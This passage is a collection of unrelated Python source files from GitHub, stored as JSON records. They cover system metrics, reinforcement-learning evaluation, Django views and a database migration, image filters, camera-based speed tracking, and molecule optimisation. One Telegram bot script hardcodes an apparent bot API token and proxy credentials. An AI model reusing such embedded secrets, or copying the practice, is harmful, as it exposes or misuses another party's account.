return disk_metrics\n\n\nclass DiskIn:\n \"\"\"Total system disk read in MB.\"\"\"\n\n name = \"disk.in\"\n samples: \"Deque[float]\"\n\n def __init__(self) -> None:\n self.samples = deque([])\n self.read_init: Optional[int] = None\n\n def sample(self) -> None:\n if self.read_init is None:\n # initialize the read_init value on first sample\n self.read_init = psutil.disk_io_counters().read_bytes\n self.samples.append(\n (psutil.disk_io_counters().read_bytes - self.read_init) / 1024 / 1024\n )\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n aggregate = aggregate_mean(self.samples)\n return {self.name: aggregate}\n\n\nclass DiskOut:\n \"\"\"Total system disk write in MB.\"\"\"\n\n name = \"disk.out\"\n samples: \"Deque[float]\"\n\n def __init__(self) -> None:\n self.samples = deque([])\n self.write_init: Optional[int] = None\n\n def sample(self) -> None:\n if self.write_init is None:\n # init on first sample\n self.write_init = psutil.disk_io_counters().write_bytes\n self.samples.append(\n (psutil.disk_io_counters().write_bytes - self.write_init) / 1024 / 1024\n )\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n aggregate = aggregate_mean(self.samples)\n return {self.name: aggregate}\n\n\n@asset_registry.register\nclass Disk:\n def __init__(\n self,\n interface: \"Interface\",\n settings: \"SettingsStatic\",\n shutdown_event: threading.Event,\n ) -> None:\n self.name = self.__class__.__name__.lower()\n self.settings = settings\n self.metrics: List[Metric] = [\n DiskUsagePercent(list(settings._stats_disk_paths or [\"/\"])),\n DiskUsage(list(settings._stats_disk_paths or [\"/\"])),\n DiskIn(),\n DiskOut(),\n ]\n self.metrics_monitor = MetricsMonitor(\n self.name,\n self.metrics,\n interface,\n settings,\n shutdown_event,\n )\n\n @classmethod\n def is_available(cls) -> bool:\n \"\"\"Return whether psutil is available to collect disk metrics.\"\"\"\n return psutil is not None\n\n def probe(self) -> dict:\n disk_paths = list(self.settings._stats_disk_paths or [\"/\"])\n disk_metrics = {}\n for disk_path in disk_paths:\n try:\n # total disk space in GB:\n total = psutil.disk_usage(disk_path).total / 1024 / 1024 / 1024\n # total disk 
space used in GB:\n used = psutil.disk_usage(disk_path).used / 1024 / 1024 / 1024\n disk_metrics[disk_path] = {\n \"total\": total,\n \"used\": used,\n }\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {disk_path}: {e}\", repeat=False)\n\n return {self.name: disk_metrics}\n\n def start(self) -> None:\n self.metrics_monitor.start()\n\n def finish(self) -> None:\n self.metrics_monitor.finish()\n","repo_name":"wandb/wandb","sub_path":"wandb/sdk/internal/system/assets/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"8690799018","text":"from plotly.graph_objs import Scatter, Line\nfrom utils.torchs import *\nimport numpy as np\nimport plotly\nimport os\n\n\nclass ActorCriticEvaluator(object):\n def __init__(self, agent, cfg, policy=None):\n self.agent = agent\n self.cfg = cfg\n self.log = None\n self.summary_dir = None\n\n # get some components from the agent\n self.env_factory = self.agent.env_factory\n self.tensor = self.agent.tensor\n self.policy = policy if policy else self.agent.policy\n self.id = self.agent.id\n\n # parameters for evaluation\n self.num_epsd = cfg[\"num_epsd\"] if \"num_epsd\" in cfg else 10\n self.max_epsd_iters = cfg[\"max_epsd_iters\"] if \"max_epsd_iters\" in cfg else 10000\n self.eval_iters = []\n self.eval_rewards = [np.zeros(self.num_epsd)] # elements are numpy array\n self.best_avg_rewards = -np.inf\n self.eval_env = self.env_factory(3333)\n self.gpu = cfg[\"gpu\"] if \"gpu\" in cfg else False\n\n def set_logger(self, log):\n self.log = log\n if not self.log.ready_for_test:\n self.log.prepare_for_test()\n self.summary_dir = self.log.task.summary_dir\n\n def place_models_on_cpu(self):\n self.agent.place_models_on_cpu()\n\n def place_models_on_gpu(self):\n self.agent.place_models_on_gpu()\n\n def eval(self, iter_i, viz=False):\n assert self.log is not None\n if use_gpu and self.gpu:\n self.place_models_on_cpu()\n\n avg_rewards, eval_rewards = self._eval(self.num_epsd)\n\n if use_gpu and self.gpu:\n self.place_models_on_gpu()\n\n self.eval_iters.append(iter_i)\n self.eval_rewards.append(eval_rewards)\n title = \"Test Rewards of \" + self.id\n if viz:\n population_plot(self.eval_iters, self.eval_rewards, title, self.summary_dir)\n return {'ravg': avg_rewards, 'rs': eval_rewards}\n\n def _eval(self, num_epsd):\n total_rewards = np.zeros(num_epsd)\n epsd_idx = 0\n epsd_iters = 0\n state = self.eval_env.reset()\n while epsd_idx < num_epsd:\n if self.agent.running_state is not None:\n state = self.agent.running_state(state, update=False)\n\n state_var = self.agent.tensor(state).unsqueeze(0)\n action = self.policy.select_action(state_var)\n next_state, reward, done, _ = self.eval_env.step(action)\n total_rewards[epsd_idx] += reward\n epsd_iters += 1\n state = next_state\n\n if done or epsd_iters >= self.max_epsd_iters:\n # print('>>> Eval: [%2d/%d], rewards: %s' % (epsd_idx + 1, num_epsd, total_rewards[epsd_idx]))\n\n if epsd_idx < num_epsd - 1: # leave last reset to next run\n state = self.eval_env.reset()\n\n epsd_idx += 1\n epsd_iters = 0\n\n avg_rewards = total_rewards.mean()\n # print('>>> Eval: avg total rewards: %s' % avg_rewards)\n return avg_rewards, total_rewards\n\n\ndef population_plot(xs, ys, title, path):\n \"\"\"Plots min, max and mean + standard deviation bars of a population over time.\n\n Parameters\n ----------\n xs: iterations, list or numpy array, shape (N, )\n ys: sum of rewards, list or numpy 
array, shape (N, num_epsd)\n title: figure title\n path: saving dir\n \"\"\"\n max_colour, mean_colour, std_colour = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)'\n\n xs, ys = np.array(xs), np.array(ys)\n ys_min, ys_max = ys.min(1).squeeze(), ys.max(1).squeeze()\n ys_mean, ys_std = ys.mean(1).squeeze(), ys.std(1).squeeze()\n ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std\n\n trace_max = Scatter(x=xs, y=ys_max, line=Line(color=max_colour, dash='dash'), name='Max')\n trace_upper = Scatter(x=xs, y=ys_upper, line=Line(color='transparent'),\n name='+1 Std. Dev.', showlegend=False)\n trace_mean = Scatter(x=xs, y=ys_mean, fill='tonexty',\n fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')\n trace_lower = Scatter(x=xs, y=ys_lower, fill='tonexty',\n fillcolor=std_colour, line=Line(color='transparent'),\n name='-1 Std. Dev.', showlegend=False)\n trace_min = Scatter(x=xs, y=ys_min, line=Line(color=max_colour, dash='dash'), name='Min')\n\n plotly.offline.plot({\n 'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],\n 'layout': dict(title=title, xaxis={'title': 'Iteration'}, yaxis={'title': title})\n }, filename=os.path.join(path, title + '.html'), auto_open=False)\n","repo_name":"lx10077/rlpy","sub_path":"core/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32049131725","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom .models import Configuracoes\nfrom contas.models import Usuario\n\ndef nova_tecnica(request, username):\n\n usuario = get_object_or_404(Usuario, username=username)\n\n if request.method == 'POST':\n\n configuracoes = Configuracoes.objects.last()\n\n tecnicas = configuracoes.tecnicas\n\n ultima_tecnica_registrada = list(tecnicas.keys())[-1]\n\n separador = ultima_tecnica_registrada.find(\"_\")\n\n chave_proxima_tecnica = f'tecnica_{int(ultima_tecnica_registrada[(separador + 1):]) + 1}'\n\n nova_tecnica = request.POST['nova_tecnica']\n\n tecnicas[chave_proxima_tecnica] = nova_tecnica\n\n configuracoes.save()\n\n return redirect(reverse('cria_equipamento', args=[usuario.username]))\n","repo_name":"gustavofisica/cme","sub_path":"apps/configuracoes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6203052053","text":"from turtle import *\n\ndef levi(l, n):\n if n == 0:\n down()\n forward(l)\n else:\n a = left(45), levi(l/(2**0.5), n-1), right(90), levi(l/(2**0.5), n-1), left(45)\n return a\n\n\ndef main():\n l = int(input('Side length:'))\n n = int(input('Recursion depth:'))\n levi(l, n)\n speed(100)\n mainloop()\n\n\nif __name__ == '__main__':\n main()","repo_name":"MAXIMZOLOTYKH11/case__3","sub_path":"Levi.py","file_name":"Levi.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759016684","text":"#!/usr/bin/python3\n\n# Returns a tuple with the length of a str and its first char\n\ndef multiple_returns(sentence):\n length = len(sentence)\n if length == 0:\n result = (0, None)\n return result\n else:\n res = (length, sentence[0:1])\n return 
res\n","repo_name":"JI-Maina/alx-higher_level_programming","sub_path":"0x03-python-data_structures/8-multiple_returns.py","file_name":"8-multiple_returns.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18636743211","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n oldToNew = {}\n p = head\n while p:\n n = Node(p.val)\n oldToNew[p] = n\n p = p.next\n oldToNew[None] = None\n \n p = head\n while p:\n n = oldToNew[p]\n n.next = oldToNew[p.next]\n n.random = oldToNew[p.random]\n p = p.next\n \n return oldToNew[head]\n ","repo_name":"Mihir-1/LeetCode-Algorithms","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73020301226","text":"# Initialization\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom itertools import chain\nfrom datetime import datetime as dt\nimport random\n\npd.set_option('display.max_columns', None)\n\n\ndef split_temporal(df, time, train_split=0.8, val_split=None):\n df[time] = pd.to_datetime(df[time])\n df = df.sort_values(time)\n\n train_ind = int(np.round(len(df)*train_split))\n train_df = df.iloc[:train_ind]\n\n if val_split is None:\n test_df = df.iloc[train_ind:]\n return train_df, test_df\n else:\n val_ind = int(np.round(len(df)*(val_split + train_split)))\n val_df = df.iloc[train_ind:val_ind]\n test_df = df.iloc[val_ind:]\n \n return train_df, val_df, test_df\n\n\ndef preprocessing(df, column):\n print(df[column].describe())\n remap = {df[column].unique()[i]: i for i in range(len(df[column].unique()))}\n df[column] = df[column].replace(remap)\n print(df[column].describe())\n print(df.head())\n return df\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"online_retail_processed.csv\")\n df = preprocessing(df, \"CustomerID\")\n df.to_csv(\"online_retail_processed.csv\", index=False)\n ","repo_name":"JuliaLWang8/RetailRecommender","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658894814","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n# from filters_image.change_filter_image import change_filter\nimport os\n\ndef image_filtering_face(path_filter,path_img,center,width,height,up,left,counte=0):\n\n\n filter_image = []\n for i in path_filter:\n filter_image.append(cv2.imread(i))\n\n image = cv2.imread(path_img)\n rows, cols, _ = image.shape\n filter1 = np.zeros((rows, cols), np.uint8)\n filter1.fill(0)\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n detector = dlib.get_frontal_face_detector()\n faces = detector(image)\n if faces:\n # try:\n for i in range(len(path_filter)):\n test = filter(image,gray_image,faces,filter_image[i],center[i],width[i],height[i],up[i],left[i])\n return test\n # except:\n # image = cv2.imread(path_img)\n\n # return image\n\n\ndef 
filter(image,gray_frame,faces,filter_image1,center,width,height,up=0,left=0):\n predictor_path = \"../assest/shape_predictor_68_face_landmarks.dat\"\n predictor = dlib.shape_predictor(predictor_path)\n for face in faces:\n try:\n landmarks = predictor(gray_frame, face)\n\n center_filter = (landmarks.part(center).x-left, landmarks.part(center).y-up)\n left_filter = (landmarks.part(4).x, landmarks.part(4).y)\n right_filter = (landmarks.part(14).x, landmarks.part(14).y)\n\n filter_width = int(hypot(left_filter[0] - right_filter[0],\n left_filter[1] - right_filter[1]) * width)\n filter_height = int(filter_width * height)\n\n # New filter position\n top_left = (int(center_filter[0] - filter_width / 2),\n int(center_filter[1] - filter_height / 2))\n bottom_right = (int(center_filter[0] + filter_width / 2),\n int(center_filter[1] + filter_height / 2))\n\n # Adding the new filter\n filtery = cv2.resize(filter_image1, (filter_width, filter_height))\n filtery_gray = cv2.cvtColor(filtery, cv2.COLOR_BGR2GRAY)\n _, filter1 = cv2.threshold(filtery_gray, 25, 255, cv2.THRESH_BINARY_INV)\n\n filter_area = image[top_left[1]: top_left[1] + filter_height,\n top_left[0]: top_left[0] + filter_width]\n filter_area_no_filter = cv2.bitwise_and(filter_area, filter_area, mask=filter1)\n final_filter = cv2.add(filter_area_no_filter, filtery)\n\n image[top_left[1]: top_left[1] + filter_height,\n top_left[0]: top_left[0] + filter_width,:] = final_filter\n print(\"filter1\")\n except:\n print(\"except\")\n return image\n # cv2.imshow(\"Frame\", image)\n # key = cv2.waitKey(0)\n\n","repo_name":"Python-Hiss/Filteristic","sub_path":"filters_image/image_filtering_face.py","file_name":"image_filtering_face.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74228822506","text":"#!/usr/bin/env python3\r\nimport requests\r\nproxies = {'https': 'socks5://telegram:telegram@jcidw.tgproxy.me:1080'}\r\nTOKEN = \"692219844:AAGM5dcY5UJL58tDUL_zgohn0Pg4NqbCyFE\"\r\nMAIN_URL = \"https://api.telegram.org/bot692219844:AAGM5dcY5UJL58tDUL_zgohn0Pg4NqbCyFE/sendMessage\"\r\n\r\npayload = {\r\n 'chat_id': 373853051,\r\n 'text': ' And hello to you too, JERK!',\r\n 'reply_to_message_id': 4\r\n}\r\n\r\nr = requests.post(MAIN_URL, proxies=proxies, data=payload)\r\n#r = requests.get(MAIN_URL, proxies=proxies)\r\n\r\nprint(r.json())\r\n#https://t.me/socks?server=jcidw.tgproxy.me&port=1080&user=telegram&pass=telegram","repo_name":"Andro1997/bot_python","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24724729692","text":"import streamlit as st\nfrom multiapp import MultiApp\n# import your app modules here\nfrom pages import analysis, dynamic_view1, dynamic_view2, sentiment_model, topic_model\n\nst.set_page_config(page_title=\"Twitter Analysis Visualization\", layout=\"wide\")\n\napp = MultiApp()\n\n\nst.sidebar.markdown(\"\"\"\n# Multi-Page App\nThis multi-page app is using the [streamlit-multiapps](https://github.com/upraneelnihar/streamlit-multiapps) framework developed by [Praneel Nihar](https://medium.com/@u.praneel.nihar). 
Also check out his [Medium article](https://medium.com/@u.praneel.nihar/building-multi-page-web-app-using-streamlit-7a40d55fa5b4).\n# Modifications\n\\t- Page Folder Based Access\n\\t- Presentation changed to SideBar\n\"\"\")\n\n# Add all your application here\napp.add_app(\"Analysis\", analysis.app)\napp.add_app(\"Dynamic Analysis 1\", dynamic_view1.app)\napp.add_app(\"Dynamic Analysis 2\", dynamic_view2.app)\napp.add_app(\"Sentiment Model\", sentiment_model.app)\napp.add_app(\"Topic Model\", topic_model.app)\n# The main app\napp.run()\n","repo_name":"Amdework21/Twitter-Data-Analysis21","sub_path":"visualization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18859830291","text":"import glob\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot\n\nfrom performance400 import intrinsic_pre_autocalibration, extrinsic_pre_calibration, extrinsic_calibration, \\\n trajectory_utils, speed_utils\n\nEXTRACT_MIRE = False\nINTRINSIC_CALIBRATION = False\nPRE_EXTRINSIC_CALIBRATION = False\n\nREFRESH_RATE = 59.94\n\n# Used to extract frames from a video of targets\nif EXTRACT_MIRE:\n left_mire = cv.VideoCapture(\"videos/targets/left.mkv\")\n right_mire = cv.VideoCapture(\"videos/targets/right.mkv\")\n intrinsic_pre_autocalibration.extract_targets(left_mire, 50, False)\n intrinsic_pre_autocalibration.extract_targets(right_mire, 50, True)\n\nleft_video = cv.VideoCapture(\"videos/runway/left_run.mkv\")\nright_video = cv.VideoCapture(\"videos/runway/right_run.mkv\")\nleft_check, left_background = left_video.read()\nright_check, right_background = right_video.read()\n\n# Used to get the intrinsic parameters of a camera\n# To use only once for a camera with no autofocus\nif INTRINSIC_CALIBRATION:\n left_targets = glob.glob(\"images/targets/left/*.jpg\")\n right_targets = glob.glob(\"images/targets/right/*.jpg\")\n intrinsic_pre_autocalibration.autocalibrate(left_targets, right_targets, 10, 7)\n\n# Used to get the points of interest of a viewpoint\n# To use only once per viewpoint calibration\nif PRE_EXTRINSIC_CALIBRATION:\n left_object_points = np.loadtxt(\"matrices/interest_points/object_points/left\")\n right_object_points = np.loadtxt(\"matrices/interest_points/object_points/right\")\n extrinsic_pre_calibration.calibrate(left_background, right_background)\n\nif (not EXTRACT_MIRE) and (not INTRINSIC_CALIBRATION):\n # We get the intrinsic parameters from the cameras and calculate their extrinsic parameters\n # This last step is used because the cameras may have moved slightly comparing to the last utilisation\n left_interest_points, right_interest_points = extrinsic_pre_calibration.get_interest_points()\n intrinsic_parameters = intrinsic_pre_autocalibration.get_intrinsic_parameters()\n extrinsic_calibration.calibrate(left_background, right_background, left_interest_points, right_interest_points,\n intrinsic_parameters)\n left_extrinsic_parameters = extrinsic_calibration.get_extrinsic_parameters(False)\n right_extrinsic_parameters = extrinsic_calibration.get_extrinsic_parameters(True)\n\n # We extract the trajectory using the two cameras\n trajectory = trajectory_utils.get_trajectory(left_video, right_video, left_lower_bound=(0, 450),\n left_upper_bound=(1680, 1080), right_lower_bound=(153, 355),\n right_upper_bound=(1920, 1080))\n\n # We draw it on the backgrounds along with the axes from the calibration\n trajectory_utils.draw_trajectory(left_background, 
trajectory.copy(), left_extrinsic_parameters)\n trajectory_utils.draw_trajectory(right_background, trajectory.copy(), right_extrinsic_parameters)\n extrinsic_calibration.draw_axes(left_background, False)\n extrinsic_calibration.draw_axes(right_background, True)\n\n # We display those backgrounds\n cv.namedWindow(\"Left trajectory\", cv.WINDOW_NORMAL)\n cv.namedWindow(\"Right trajectory\", cv.WINDOW_NORMAL)\n cv.imshow(\"Left trajectory\", left_background)\n cv.imshow(\"Right trajectory\", right_background)\n\n cv.waitKey(0)\n cv.destroyAllWindows()\n left_video.release()\n right_video.release()\n\n # Finally we output speed profiles\n speed_profile, index_speed = speed_utils.get_speed_raw_profile(trajectory, REFRESH_RATE)\n speed_utils.export_speed_profiles(trajectory, REFRESH_RATE)\n pyplot.title(\"Speed profile\")\n pyplot.xlabel(\"Distance (m)\")\n pyplot.ylabel(\"Speed (m/s)\")\n pyplot.plot(index_speed, speed_profile)\n pyplot.show()\n","repo_name":"thomas-schillaci/performance400","sub_path":"performance400/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34296763762","text":"import os\nimport dotenv\nfrom django.db import DataError\nfrom pymongo import MongoClient\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom turtle_inc import settings\nfrom .models import *\nfrom .persistence import PostgresPersistence, MongoPersistence\n\n\npersistence = PostgresPersistence() if not eval(os.environ.get(\"USE_NOSQL\")) else MongoPersistence()\n\n\nclass Clients(APIView):\n def get(self, request):\n return Response(persistence.get_clients(), status=status.HTTP_200_OK)\n\n def post(self, request):\n data = request.data\n if data.get(\"nombre\") is None or 
\\\n data.get(\"descripcion\") is None or \\\n data.get(\"precio\") is None or \\\n data.get(\"stock\") is None:\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\n try:\n return Response(persistence.new_product(data.get(\"marca\"), data.get(\"nombre\"), data.get(\"descripcion\"), data.get(\"precio\"), data.get(\"stock\")), status=status.HTTP_201_CREATED)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProductInformation(APIView):\n def get(self, request, id):\n try:\n return Response(persistence.get_product(id), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, id):\n try:\n data = request.data\n if len(data) == 0:\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response(persistence.update_product(id, data.get(\"marca\"), data.get(\"nombre\"), data.get(\"descripcion\"), data.get(\"precio\"), data.get(\"stock\")), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, id):\n try:\n return Response(persistence.delete_product(id), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass MigrationAssistant(APIView):\n def post(self, request):\n print(eval(os.environ.get(\"USE_NOSQL\")))\n if eval(os.environ.get(\"USE_NOSQL\")):\n return Response({\"error\": \"Already migrated to NoSQL\"}, status=status.HTTP_400_BAD_REQUEST)\n\n mongo_client = MongoClient(os.environ.get(\"MONGO_HOST\"), int(os.environ.get(\"MONGO_PORT\")))\n mongo_client.drop_database(os.environ.get(\"MONGO_DATABASE\"))\n db = mongo_client[os.environ.get(\"MONGO_DATABASE\")]\n clients = db[\"E01_CLIENTE\"]\n products = db[\"E01_PRODUCTO\"]\n invoices = db[\"E01_FACTURA\"]\n\n product_objects = []\n for product in Producto.objects.all():\n product_objects.append({\n \"codigo_producto\": product.codigo_producto,\n \"marca\": product.marca,\n \"nombre\": product.nombre,\n \"descripcion\": product.descripcion,\n \"precio\": product.precio,\n \"stock\": product.stock\n })\n products.insert_many(product_objects)\n\n for client in Cliente.objects.all():\n telephones = []\n for telephone in client.telefono_set.all():\n telephones.append({\n \"codigo_area\": telephone.codigo_area,\n \"nro_telefono\": telephone.nro_telefono,\n \"tipo\": telephone.tipo\n })\n clients.insert_one({\n \"nro_cliente\": client.nro_cliente,\n \"nombre\": client.nombre,\n \"apellido\": client.apellido,\n \"direccion\": client.direccion,\n \"activo\": client.activo,\n \"telefonos\": telephones\n })\n\n for invoice in Factura.objects.all():\n details = []\n for detail in invoice.detallefactura_set.all():\n details.append({\n \"id_producto\": products.find_one({\"codigo_producto\": detail.codigo_producto.codigo_producto})[\"_id\"],\n \"nro_item\": detail.nro_item,\n \"cantidad\": detail.cantidad\n })\n invoices.insert_one({\n \"fecha\": invoice.fecha.isoformat(),\n \"total_sin_iva\": invoice.total_sin_iva,\n \"total_con_iva\": invoice.total_con_iva,\n \"iva\": invoice.iva,\n \"id_cliente\": clients.find_one({\"nro_cliente\": invoice.nro_cliente.nro_cliente})[\"_id\"],\n \"detalle_factura\": details\n })\n\n global persistence\n persistence = MongoPersistence()\n os.environ[\"USE_NOSQL\"] = \"True\"\n 
dotenv.set_key(os.path.join(settings.BASE_DIR, \".env\"), \"USE_NOSQL\", os.environ[\"USE_NOSQL\"])\n\n return Response({}, status=status.HTTP_200_OK)\n","repo_name":"alejofl/tpo-bd2","sub_path":"turtle_inc/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4538480206","text":"import csv\r\nimport eightpuzzle as ep\r\nimport search\r\n\r\n# Define the search strategies\r\nstrategies = [search.dfs, search.bfs, search.aStarSearch]\r\n ##,search.uniformCostSearch, search.astar ]\r\n\r\n# Define the best heuristic from Task 2\r\nbest_heuristic = ep.h1 # Replace with your best heuristic\r\n\r\n# Open the scenarios file and read all scenarios\r\nwith open('scenarios.csv', 'r') as scenarios_file:\r\n scenarios = list(csv.reader(scenarios_file))\r\n\r\n# Open the results file\r\nwith open('BestSearchResults.csv', 'w', newline='') as results_file:\r\n results_writer = csv.writer(results_file)\r\n\r\n # Write the header row\r\n results_writer.writerow(['Scenario', 'Strategy', 'Depth', 'Expanded nodes', 'Fringe size'])\r\n\r\n # For each scenario\r\n for scenario in scenarios:\r\n if scenario: # Skip empty lines\r\n # Parse the scenario to get the initial state\r\n initial_state = list(map(int, scenario))\r\n print(f\"\\nScenario: {initial_state}\")\r\n\r\n # Create an 8-puzzle problem instance\r\n puzzle = ep.EightPuzzleState(initial_state)\r\n problem = ep.EightPuzzleSearchProblem(puzzle)\r\n\r\n # For each strategy\r\n for strategy in strategies:\r\n print(f\"Applying {strategy.__name__}...\")\r\n if strategy == search.astar:\r\n # Use the best heuristic for A* search\r\n actions = strategy(problem, heuristic=best_heuristic)\r\n else:\r\n # Use the strategy without a heuristic\r\n actions = strategy(problem)\r\n\r\n # Record the results (depth, expanded nodes, fringe size)\r\n depth = len(actions)\r\n expanded_nodes = problem.expandedNodes\r\n fringe_size = problem.fringeSize\r\n\r\n print(f\"Depth: {depth}, Expanded nodes: {expanded_nodes}, Fringe size: {fringe_size}\")\r\n\r\n # Write the results to the CSV file\r\n results_writer.writerow([initial_state, strategy.__name__, depth, expanded_nodes, fringe_size])\r\n","repo_name":"MohamedMiladi777/eight_puzzle_project","sub_path":"besy_search_method.py","file_name":"besy_search_method.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73799496427","text":"import argparse\nimport os\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom rdkit import Chem\n\nfrom main_mol_opt import triple_run\nfrom src.rl.applications.mol import hyp\nfrom src.rl.applications.mol.agent_mol_opt import RewardMolecule\nfrom src.rl.applications.mol.model.dqn import MolDQN\nfrom src.rl.applications.mol.model.model_definitions import triple_predict\n\nwarnings.filterwarnings(\"ignore\")\n# python3 run_mol_opt.py -f 0 -p 320 -freq 500 -m \"random\"\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--file', type=int, required=True)\nparser.add_argument('-p', '--points', nargs='?', const=800, type=int, default=800)\nparser.add_argument('-freq', '--frequency', nargs='?', const=500, type=int, default=500)\nparser.add_argument('-m', '--mode', nargs='?', const='random', type=str, default=\"random\")\nargs = parser.parse_args()\n\nmodel1 = MolDQN(hyp.fingerprint_length, 2)\ndevice = 
torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel1.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model1.pth', map_location=device))\nmodel1.to(device)\nmodel1.eval()\n\nmodel2 = MolDQN(hyp.fingerprint_length, 2)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel2.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model2.pth', map_location=device))\nmodel2.to(device)\nmodel2.eval()\n\nmodel3 = MolDQN(hyp.fingerprint_length, 2)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel3.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model3.pth', map_location=device))\nmodel3.to(device)\nmodel3.eval()\n\n\ndef approx_reward(smiles, ref_homo, ref_lumo, model1_, model2_, model3_):\n molecule = Chem.MolFromSmiles(smiles)\n predictions = triple_predict(molecule, model1_, model2_, model3_)\n homo, lumo = np.mean(predictions, axis=0)\n diff = lumo - homo\n diff_ref = ref_lumo - ref_homo\n # logp = penalized_logp(molecule)\n # logp_ref = hyp.logp_ref\n penalty = np.abs(diff - diff_ref) * 27.2114 + (lumo - ref_lumo) * 27.2114\n # penalty += 0.1*(logp - logp_ref) ** 2\n return -penalty\n\n\nclass property(RewardMolecule):\n model1 = None\n model2 = None\n model3 = None\n ref_homo = None\n ref_lumo = None\n\n def _reward(self):\n return approx_reward(self._state, self.ref_homo, self.ref_lumo, self.model1, self.model2, self.model3)\n\n\nTB_LOG_PATH = \"outputs/mol/mol_opt/retrain\"\nif not os.path.exists(TB_LOG_PATH):\n os.makedirs(TB_LOG_PATH, exist_ok=True)\n\nchk_dir = TB_LOG_PATH + \"/checkpoints_\" + str(args.file)\nif not os.path.exists(chk_dir):\n os.makedirs(chk_dir, exist_ok=True)\n\n# checkpoint = chk_dir + \"/checkpoint_2500/\"\nepisodes_list, original_smiles_list, SMILES_list, rewards_list = triple_run(property, chk_dir=chk_dir,\n start_from_chk=None,\n model1=model1, model2=model2,\n model3=model3,\n approx_reward=approx_reward,\n model_update=True,\n update_mode=args.mode,\n n_points=int(args.points),\n frequency=args.frequency,\n column=\"HOMO_LUMO\")\n\ndf = pd.DataFrame()\ndf[\"episode\"] = episodes_list\ndf[\"SMILES0\"] = original_smiles_list\ndf[\"SMILES\"] = SMILES_list\ndf[\"reward\"] = rewards_list\ndf.to_csv(TB_LOG_PATH + \"/\" + str(args.file) + \".csv\", index=False, 